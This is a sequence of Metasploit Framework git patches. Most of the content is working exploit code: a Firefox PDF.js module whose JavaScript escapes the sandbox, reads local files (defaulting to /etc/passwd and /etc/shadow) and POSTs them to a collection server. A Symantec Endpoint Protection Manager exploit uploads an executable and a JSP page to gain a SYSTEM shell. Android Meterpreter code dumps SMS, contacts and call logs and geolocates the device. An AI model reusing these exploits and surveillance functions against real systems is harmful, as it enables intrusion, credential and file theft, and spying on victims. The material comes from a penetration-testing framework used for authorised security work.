+      'Name'        => 'Firefox PDF.js Browser File Theft',
+      'Description' => %q{
+        This module abuses an XSS vulnerability in versions of Firefox 39.0.3, Firefox ESR
+        before 38.1.1, and Firefox OS before 2.2 that allows arbitrary files to be stolen.
+        The vulnerability occurs in the PDF.js component, which uses Javascript to render
+        a PDF inside a frame with privileges to read local files. The in-the-wild malicious
+        payloads searched for sensitive files on Windows, Linux, and OSX. Android versions
+        are reported to be unaffected, as they do not use the Mozilla PDF viewer.
+      },
+      'Author'         => [
+        'Unknown', # From an 0day served on Russian news website
+        'fukusa',  # Hacker news member that reported the issue
+        'Unknown'  # Metasploit module
+      ],
+      'License'     => MSF_LICENSE,
+      'Actions'     => [[ 'WebServer' ]],
+      'PassiveActions' => [ 'WebServer' ],
+      'References' =>
+        [
+          ['URL', 'https://paste.debian.net/290146'], # 0day exploit
+          ['URL', 'https://news.ycombinator.com/item?id=10021376'], # discussion with discoverer
+          ['URL', 'https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/'],
+          ['CVE', '2015-4495']
+        ],
+      'DefaultAction'  => 'WebServer'
+    ))
+
+    register_options([
+      OptString.new('FILES', [
+        false,
+        'Comma-separated list of files to steal',
+        '/etc/passwd, /etc/shadow'
+      ])
+    ], self.class)
+
+    register_advanced_options([
+      OptInt.new('PER_FILE_SLEEP', [
+        false,
+        'Milliseconds to wait before attempting to read the frame containing each file',
+        250
+      ])
+    ], self.class)
+  end
+
+  def run
+    print_status("File targeted for exfiltration: #{JSON.generate(file_urls)}")
+    exploit
+  end
+
+  def on_request_uri(cli, request)
+    if request.method.downcase == 'post'
+      print_status('Got POST request...')
+      process_post(cli, request)
+      send_response_html(cli, '')
+    else
+      print_status('Sending exploit...')
+      send_response_html(cli, html)
+    end
+  end
+
+  def process_post(cli, req)
+    name = req.qstring['name']
+    print_good "Received #{name}, size #{req.body.bytes.length}..."
+    output = store_loot(
+      name || "data", "text/plain", cli.peerhost, req.body, "firefox_theft", "Firefox PDF.js exfiltrated file"
+    )
+    print_good "Stored to #{output}"
+  end
+
+  def html
+    exploit_js = js+file_payload+"}, 20);"
+    "<!doctype html><html><body><script>#{exploit_js}</script></body></html>"
+  end
+
+  def backend_url
+    proto = (datastore["SSL"] ? "https" : "http")
+    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
+    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
+  end
+
+
+  def file_payload
+    %Q|
+      var files = (#{JSON.generate(file_urls)});
+      function next() {
+        var f = files.pop();
+        if (f) {
+          get("file://"+f, function() {
+            var data = get_data(this);
+            var x = new XMLHttpRequest;
+            x.open("POST", "#{backend_url}?name="+encodeURIComponent("%URL%"));
+            x.send(data);
+          }, #{datastore['PER_FILE_SLEEP']}, "%URL%", f);
+          setTimeout(next, #{datastore['PER_FILE_SLEEP']}+200);
+        }
+      }
+      next();
+    |
+  end
+
+  def file_urls
+    datastore['FILES'].split(',').map(&:strip)
+  end
+
+  def js
+    <<-EOJS
+function xml2string(obj) {
+  return new XMLSerializer().serializeToString(obj);
+}
+
+function __proto(obj) {
+  return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
+}
+
+function get(path, callback, timeout, template, value) {
+  callback = _(callback);
+  if (template && value) {
+    callback = callback.replace(template, value);
+  }
+  js_call1 = 'javascript:' + _(function() {
+    try {
+      open("%url%", "_self");
+    } catch (e) {
+      history.back();
+    }
+    undefined;
+  }, "%url%", path);
+  js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
+  sandboxContext(_(function() {
+    p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+    l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+    l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
+  }));
+  setTimeout((function() {
+    sandboxContext(_(function() {
+      p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+      l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+      l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
+    }));
+  }), timeout);
+}
+
+function get_data(obj) {
+  data = null;
+  try {
+    data = obj.document.documentElement.innerHTML;
+    if (data.indexOf('dirListing') < 0) {
+      throw new Error();
+    }
+  } catch (e) {
+    if (this.document instanceof XMLDocument) {
+        data = xml2string(this.document);
+    } else {
+      try {
+          if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
+              data = this.document.body.firstChild.textContent;
+          } else {
+              throw new Error();
+          }
+      } catch (e) {
+        try {
+          if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
+              return null;
+          } else {
+              throw new Error();
+          }
+        } catch (e) {
+          ;;
+        }
+      }
+    }
+  }
+  return data;
+}
+
+function _(s, template, value) {
+  s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
+  s = s.substring(0, s.length - 1);
+  if (template && value) {
+    s = s.replace(template, value);
+  }
+  s += __proto;
+  s += xml2string;
+  s += get_data;
+  s = s.replace(/\\s\\/\\/.*\\n/g, "");
+  s = s + ";undefined";
+  return s;
+}
+
+function get_sandbox_context() {
+  if (window.my_win_id == null) {
+    for (var i = 0; i < 20; i++) {
+      try {
+        if (window[i].location.toString().indexOf("view-source:") != -1) {
+          my_win_id = i;
+          break;
+        }
+      } catch (e) {}
+    }
+  };
+  if (window.my_win_id == null)
+    return;
+  clearInterval(sandbox_context_i);
+  object.data = 'view-source:' + blobURL;
+  window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
+  object.data = 'data:text/html,<'+'html/>';
+  window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
+    '"position:absolute; left:-9999px;" onload = "'+_(function(){
+    window.wrappedJSObject.sandboxContext=(function(cmd) {
+      with(importFunction.constructor('return this')()) {
+        return eval(cmd);
+      }
+    });
+  }) + '"/>');
+}
+
+
+var i = document.createElement("iframe");
+i.id = "i";
+i.width=i.height=0;
+i.style='position:absolute;left:-9999px;';
+i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
+document.documentElement.appendChild(i);
+i.onload = function() {
+  if (this.contentDocument.styleSheets.length > 0) {
+    var i2 = document.createElement("iframe");
+    i2.id = "i2";
+    i2.width=i2.height=0;
+    i2.style='position:absolute;left:-9999px;';
+    i2.src = "data:application/pdf,";
+    document.documentElement.appendChild(i2);
+    pdfBlob = new Blob([''], {
+        type: 'application/pdf'
+    });
+    blobURL = URL.createObjectURL(pdfBlob);
+    object = document.createElement('object');
+    object.data = 'data:application/pdf,';
+    object.onload = (function() {
+        sandbox_context_i = setInterval(get_sandbox_context, 200);
+        object.onload = null;
+        object.data = 'view-source:' + location.href;
+        return;
+    });
+    document.documentElement.appendChild(object);
+  } else {
+    this.contentWindow.location.reload();
+  }
+}
+
+var kill = setInterval(function() {
+  if (window.sandboxContext) {
+    clearInterval(kill);
+  } else {
+    return;
+  }
+EOJS
+  end
+end

From f25a5da46f11e27aaacc8655015fc3f0568e78d5 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 14 Aug 2015 12:37:49 -0500
Subject: [PATCH 0979/1013] Do Minor fixes

---
 lib/msf/util/payload_cached_size.rb                       | 8 ++++----
 .../shared/examples/payload_cached_size_is_consistent.rb  | 3 ---
 2 files changed, 4 insertions(+), 7 deletions(-)

diff --git a/lib/msf/util/payload_cached_size.rb b/lib/msf/util/payload_cached_size.rb
index e299739664..0063b51ea1 100644
--- a/lib/msf/util/payload_cached_size.rb
+++ b/lib/msf/util/payload_cached_size.rb
@@ -14,7 +14,7 @@ module Util
 
 class PayloadCachedSize
 
-  @opts = {
+  OPTS = {
     'Format'      => 'raw',
     'Options'     => {
       'CPORT' => 4444,
@@ -81,7 +81,7 @@ class PayloadCachedSize
   # @return [Fixnum]
   def self.compute_cached_size(mod)
     return ":dynamic" if is_dynamic?(mod)
-    return mod.generate_simple(@opts).size
+    return mod.generate_simple(OPTS).size
   end
 
   # Determines whether a payload generates a static sized output
@@ -92,7 +92,7 @@ class PayloadCachedSize
   # @return [Fixnum]
   def self.is_dynamic?(mod, generation_count=5)
     [*(1..generation_count)].map{|x|
-      mod.generate_simple(@opts).size}.uniq.length != 1
+      mod.generate_simple(OPTS).size}.uniq.length != 1
   end
 
   # Determines whether a payload's CachedSize is up to date
@@ -102,7 +102,7 @@ class PayloadCachedSize
   def self.is_cached_size_accurate?(mod)
     return true if mod.dynamic_size? && is_dynamic?(mod)
     return false if mod.cached_size.nil?
-    mod.cached_size == mod.generate_simple(@opts).size
+    mod.cached_size == mod.generate_simple(OPTS).size
   end
 
 end
diff --git a/spec/support/shared/examples/payload_cached_size_is_consistent.rb b/spec/support/shared/examples/payload_cached_size_is_consistent.rb
index 0a687994e8..f1c02204e6 100644
--- a/spec/support/shared/examples/payload_cached_size_is_consistent.rb
+++ b/spec/support/shared/examples/payload_cached_size_is_consistent.rb
@@ -86,9 +86,6 @@ shared_examples_for 'payload cached size is consistent' do |options|
 
   include_context 'Msf::Simple::Framework#modules loading'
 
-  datastore = {
-  }
-
   opts = {
     'Format'      => 'raw',
     'Options'     => {

From 82193f11e7e758a6d0c4226e36e97c39eac7e912 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 14 Aug 2015 14:45:29 -0500
Subject: [PATCH 0980/1013] Minor js fixes

---
 modules/auxiliary/gather/firefox_pdfjs_file_theft.rb | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
index 6d52a81cfa..6b776190dc 100644
--- a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
+++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
@@ -90,7 +90,9 @@ class Metasploit3 < Msf::Auxiliary
     proto = (datastore["SSL"] ? "https" : "http")
     myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
-    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
+    resource = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
+
+    "#{proto}://#{myhost}#{port_str}#{resource}/catch"
   end
 
 
@@ -142,7 +144,9 @@ function get(path, callback, timeout, template, value) {
   }, "%url%", path);
   js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
   sandboxContext(_(function() {
+    i = document.getElementById('i');
     p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+    i2 = document.getElementById('i2');
     l = p.__lookupSetter__.call(i2.contentWindow, 'location');
     l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
   }));

From a560496455e7b8e31e514b98c13d3cc75b216271 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 14 Aug 2015 14:49:53 -0500
Subject: [PATCH 0981/1013] Do minor ruby style fixes

---
 .../gather/firefox_pdfjs_file_theft.rb        | 27 ++++++++++---------
 1 file changed, 14 insertions(+), 13 deletions(-)

diff --git a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
index 6b776190dc..80e049155d 100644
--- a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
+++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
@@ -14,12 +14,12 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'Firefox PDF.js Browser File Theft',
       'Description' => %q{
-        This module abuses an XSS vulnerability in versions of Firefox 39.0.3, Firefox ESR
-        before 38.1.1, and Firefox OS before 2.2 that allows arbitrary files to be stolen.
-        The vulnerability occurs in the PDF.js component, which uses Javascript to render
-        a PDF inside a frame with privileges to read local files. The in-the-wild malicious
-        payloads searched for sensitive files on Windows, Linux, and OSX. Android versions
-        are reported to be unaffected, as they do not use the Mozilla PDF viewer.
+        This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR
+        38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability
+        occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with
+        privileges to read local files. The in-the-wild malicious payloads searched for sensitive
+        files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they
+        do not use the Mozilla PDF viewer.
       },
       'Author'         => [
         'Unknown', # From an 0day served on Russian news website
@@ -74,25 +74,26 @@ class Metasploit3 < Msf::Auxiliary
 
   def process_post(cli, req)
     name = req.qstring['name']
-    print_good "Received #{name}, size #{req.body.bytes.length}..."
+    print_good("Received #{name}, size #{req.body.bytes.length}...")
     output = store_loot(
-      name || "data", "text/plain", cli.peerhost, req.body, "firefox_theft", "Firefox PDF.js exfiltrated file"
+      name || 'data', 'text/plain', cli.peerhost, req.body, 'firefox_theft', 'Firefox PDF.js exfiltrated file'
     )
-    print_good "Stored to #{output}"
+    print_good("Stored to #{output}")
   end
 
   def html
-    exploit_js = js+file_payload+"}, 20);"
+    exploit_js = js + file_payload + '}, 20);'
+
     "<!doctype html><html><body><script>#{exploit_js}</script></body></html>"
   end
 
   def backend_url
-    proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    proto = (datastore['SSL'] ? 'https' : 'http')
+    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     resource = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
 
-    "#{proto}://#{myhost}#{port_str}#{resource}/catch"
+    "#{proto}://#{my_host}#{port_str}#{resource}/catch"
   end
 
 

From 4aa3be7ba2a9b6b4beab0acf74d98af8ea87aec1 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 14 Aug 2015 17:00:27 -0500
Subject: [PATCH 0982/1013] Do ruby fixing and use FileDropper

---
 .../windows/http/sepm_auth_bypass_rce.rb      | 49 +++++++++++--------
 1 file changed, 28 insertions(+), 21 deletions(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 06e9a54757..f6deac9ab2 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -8,20 +8,21 @@ require 'msf/core'
 class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
+      'Name'           => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
       'Description'    => %q{
-      This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
-      in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM
+        This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
+        in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'bperry', #metasploit module
-          'Markus Wulftange' #discovery
+          'Markus Wulftange', #discovery
+          'bperry' # metasploit module
         ],
       'References'     =>
         [
@@ -36,12 +37,14 @@ class Metasploit4 < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Automatic', {
-            'Arch' => ARCH_X86,
-            'Payload' => {
-              'DisableNops' => true
+          [ 'Automatic',
+            {
+              'Arch' => ARCH_X86,
+              'Payload' => {
+                'DisableNops' => true
+              }
             }
-          } ],
+          ],
         ],
       'Privileged'     => true,
       'DisclosureDate' => 'Jul 31 2015',
@@ -58,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote
     meterp = Rex::Text.rand_text_alpha(10)
     jsp = Rex::Text.rand_text_alpha(10)
 
-    print_status("Getting cookie")
+    print_status("#{peer} - Getting cookie...")
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
@@ -70,21 +73,21 @@ class Metasploit4 < Msf::Exploit::Remote
       }
     })
 
-    unless res
-      fail_with(Failure::Unknown, 'The server did not respond in an expected way')
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
     end
 
     cookie = res.get_cookies
 
-    if cookie == nil || cookie == ''
-      fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
+    if cookie.nil? || cookie.empty?
+      fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
     end
 
     exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
 <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
     }
 
-    print_status('Uploading payload...')
+    print_status("#{peer} - Uploading payload...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -100,10 +103,12 @@ class Metasploit4 < Msf::Exploit::Remote
     })
 
     unless res && res.code == 200
-      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
     end
 
-    print_status("Uploading JSP page to execute the payload...")
+    register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")
+
+    print_status("#{peer} - Uploading JSP page to execute the payload...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -119,12 +124,14 @@ class Metasploit4 < Msf::Exploit::Remote
     })
 
     unless res && res.code == 200
-      fail_with(Failure::Unknown, 'Server did not respond in an expected way.')
+      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
     end
 
-    print_status('Executing payload. Manual cleanup will be required.')
+    register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")
+
+    print_status("#{peer} - Executing payload. Manual cleanup will be required.")
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
-    })
+    }, 5)
   end
 end

From b33abd72cefafb228f81b74eb5a65f7e05fd4890 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 14 Aug 2015 17:03:21 -0500
Subject: [PATCH 0983/1013] Complete description

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index f6deac9ab2..a61073ba6b 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -16,7 +16,9 @@ class Metasploit4 < Msf::Exploit::Remote
       'Name'           => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
       'Description'    => %q{
         This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
-        in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM.
+        in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
+        include an authentication bypass, a directory traversal and a privilege escalation to
+        get privileged code execution.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

From 3aab9aa74c0c886616a0ea3f3ac9aedd5319bd38 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 14 Aug 2015 17:13:11 -0500
Subject: [PATCH 0984/1013] move BSSID checker to tools, fixup rubocop
 warnings, add OS X example

---
 lib/rex/google_geolocation.rb   | 22 ++--------------------
 tools/google_geolocate_bssid.rb | 31 +++++++++++++++++++++++++++++++
 2 files changed, 33 insertions(+), 20 deletions(-)
 create mode 100755 tools/google_geolocate_bssid.rb

diff --git a/lib/rex/google_geolocation.rb b/lib/rex/google_geolocation.rb
index 03284060d1..86d1527b65 100755
--- a/lib/rex/google_geolocation.rb
+++ b/lib/rex/google_geolocation.rb
@@ -10,7 +10,6 @@ module Rex
   #   g.fetch!
   #   puts g, g.google_maps_url
   class GoogleGeolocation
-
     GOOGLE_API_URI = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true&"
 
     attr_accessor :accuracy
@@ -27,7 +26,7 @@ module Rex
     def fetch!
       @uri.query << @wlan_list.join("&wifi=")
       request = Net::HTTP::Get.new(@uri.request_uri)
-      http = Net::HTTP::new(@uri.host,@uri.port)
+      http = Net::HTTP.new(@uri.host, @uri.port)
       http.use_ssl = true
       response = http.request(request)
 
@@ -37,7 +36,7 @@ module Rex
         self.longitude = results["location"]["lng"]
         self.accuracy = results["accuracy"]
       else
-        raise "Failure connecting to Google for location lookup."
+        fail "Failure connecting to Google for location lookup."
       end
     end
 
@@ -61,22 +60,5 @@ module Rex
     def to_s
       "Google indicates the device is within #{accuracy} meters of #{latitude},#{longitude}."
     end
-
   end
 end
-
-if $0 == __FILE__
-  if ARGV.empty?
-    $stderr.puts("Usage: #{$0} <mac> [mac] ...")
-    $stderr.puts("Ask Google for the location of the given set of BSSIDs")
-    $stderr.puts
-    $stderr.puts("Example: iwlist sc 2>/dev/null|awk '/Address/{print $5}'|xargs #{$0}")
-    exit(1)
-  end
-  g = Rex::GoogleGeolocation.new
-  ARGV.each do |mac|
-    g.add_wlan(mac, nil, -83)
-  end
-  g.fetch!
-  puts g, g.google_maps_url
-end
diff --git a/tools/google_geolocate_bssid.rb b/tools/google_geolocate_bssid.rb
new file mode 100755
index 0000000000..20b532cbce
--- /dev/null
+++ b/tools/google_geolocate_bssid.rb
@@ -0,0 +1,31 @@
+#!/usr/bin/env ruby
+#
+# This tool asks Google for the location of a given set of BSSIDs
+#
+
+msfbase = __FILE__
+while File.symlink?(msfbase)
+  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+end
+
+$LOAD_PATH.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', 'lib')))
+require 'rex/google_geolocation'
+require 'optparse'
+
+if ARGV.empty?
+  $stderr.puts("Usage: #{$PROGRAM_NAME} <mac> [mac] ...")
+  $stderr.puts("Ask Google for the location of the given set of BSSIDs")
+  $stderr.puts
+  $stderr.puts("Example: iwlist sc 2>/dev/null|awk '/Address/{print $5}'|xargs #{$PROGRAM_NAME}")
+  $stderr.puts("Example: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -I|awk '/BSSID/{print $2}'|xargs #{$PROGRAM_NAME}")
+  exit(1)
+end
+
+g = Rex::GoogleGeolocation.new
+ARGV.each do |mac|
+  g.add_wlan(mac, nil, -83)
+end
+
+g.fetch!
+
+puts g, g.google_maps_url

From f4031d87fcfef5b69b743b664c8805cd5fc6e912 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 14 Aug 2015 17:17:00 -0500
Subject: [PATCH 0985/1013] light ruby style cleanups

---
 .../meterpreter/extensions/android/android.rb | 98 ++++++++-----------
 1 file changed, 39 insertions(+), 59 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index 957118fcbf..86ea185dc4 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -5,21 +5,16 @@ require 'rex/post/meterpreter/packet'
 require 'rex/post/meterpreter/client'
 require 'rex/post/meterpreter/channels/pools/stream_pool'
 
-
 module Rex
 module Post
 module Meterpreter
 module Extensions
 module Android
-
 ###
 # Android extension - set of commands to be executed on android devices.
 # extension by Anwar Mohamed (@anwarelmakrahy)
 ###
-
-  
 class Android < Extension
-
   def initialize(client)
     super(client, 'android')
 
@@ -30,88 +25,77 @@ class Android < Extension
         {
           'name' => 'android',
           'ext'  => self
-        },
+        }
       ])
   end
-  
+
   def device_shutdown(n)
     request = Packet.create_request('device_shutdown')
     request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n)
     response = client.send_request(request)
-    return response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
-  end 
-  
+    response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
+  end
+
   def dump_sms
-    sms = Array.new
+    sms = []
     request = Packet.create_request('dump_sms')
     response = client.send_request(request)
 
-    response.each( TLV_TYPE_SMS_GROUP ) { |p|
-
-      sms <<
-      {
+    response.each(TLV_TYPE_SMS_GROUP) do |p|
+      sms << {
         'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_TYPE).value),
         'address' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_ADDRESS).value),
         'body' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_BODY).value).squish,
         'status' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_STATUS).value),
         'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_DATE).value)
       }
-
-    }
-    return sms
+    end
+    sms
   end
 
   def dump_contacts
-    contacts = Array.new
+    contacts = []
     request = Packet.create_request('dump_contacts')
     response = client.send_request(request)
 
-    response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
-
-      contacts <<
-      {
+    response.each(TLV_TYPE_CONTACT_GROUP) do |p|
+      contacts << {
         'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CONTACT_NAME).value),
         'email' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_EMAIL)),
         'number' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_NUMBER))
       }
-
-    }
-    return contacts
+    end
+    contacts
   end
 
   def geolocate
-
-    loc = Array.new
+    loc = []
     request = Packet.create_request('geolocate')
     response = client.send_request(request)
 
-    loc <<
-    {
+    loc << {
       'lat' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LAT).value),
       'long' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LONG).value)
     }
 
-    return loc
+    loc
   end
 
   def dump_calllog
-    log = Array.new
+    log = []
     request = Packet.create_request('dump_calllog')
     response = client.send_request(request)
 
-    response.each(TLV_TYPE_CALLLOG_GROUP) { |p|
-
-      log <<
-      {
+    response.each(TLV_TYPE_CALLLOG_GROUP) do |p|
+      log << {
         'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NAME).value),
         'number' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NUMBER).value),
         'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DATE).value),
         'duration' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DURATION).value),
         'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_TYPE).value)
       }
-
-    }
-    return log
+    end
+    log
   end
 
   def check_root
@@ -120,41 +104,37 @@ class Android < Extension
     response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
   end
 
-  def send_sms(dest,body,dr)
+  def send_sms(dest, body, dr)
     request = Packet.create_request('send_sms')
-    request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
-    request.add_tlv(TLV_TYPE_SMS_BODY,body)
-    request.add_tlv(TLV_TYPE_SMS_DR,dr)
+    request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest)
+    request.add_tlv(TLV_TYPE_SMS_BODY, body)
+    request.add_tlv(TLV_TYPE_SMS_DR, dr)
     if dr == false
-      response=client.send_request(request)
-      sr=response.get_tlv(TLV_TYPE_SMS_SR).value
+      response = client.send_request(request)
+      sr = response.get_tlv(TLV_TYPE_SMS_SR).value
       return sr
     else
-      response=client.send_request(request,30)
-      sr=response.get_tlv(TLV_TYPE_SMS_SR).value
-      dr=response.get_tlv(TLV_TYPE_SMS_SR).value
-      return [sr,dr]
+      response = client.send_request(request, 30)
+      sr = response.get_tlv(TLV_TYPE_SMS_SR).value
+      dr = response.get_tlv(TLV_TYPE_SMS_SR).value
+      return [sr, dr]
     end
   end
 
   def wlan_geolocate
     request = Packet.create_request('wlan_geolocate')
-    response = client.send_request(request,30)
-    networks=[]
-    response.each( TLV_TYPE_WLAN_GROUP ) { |p|
-
-      networks <<
-      {
+    response = client.send_request(request, 30)
+    networks = []
+    response.each(TLV_TYPE_WLAN_GROUP) do |p|
+      networks << {
         'ssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_SSID).value),
         'bssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_BSSID).value),
         'level' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_LEVEL).value)
       }
-
-    }
-    return networks
+    end
+    networks
   end
 end
-
 end
 end
 end

From 82e1181ccb9dca89bd926e977d3955c2f9d415f0 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 14 Aug 2015 17:38:54 -0500
Subject: [PATCH 0986/1013] update to metasploit-payloads 1.0.8

---
 Gemfile.lock                 | 4 ++--
 metasploit-framework.gemspec | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index b93b5fb156..8eb7bd06d0 100644
